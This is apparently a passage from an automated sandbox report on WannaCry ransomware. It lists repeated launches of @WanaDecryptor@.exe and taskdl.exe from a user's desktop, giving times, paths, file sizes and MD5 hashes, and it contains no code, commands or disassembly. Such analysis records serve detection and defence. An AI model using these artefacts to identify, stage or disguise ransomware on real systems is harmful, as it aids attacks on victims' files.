                                                                              Target ID:204
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:205
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:206
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:207
                                                                              Start time:02:43:42
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:208
                                                                              Start time:02:43:43
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:209
                                                                              Start time:02:43:43
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:210
                                                                              Start time:02:43:43
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              No disassembly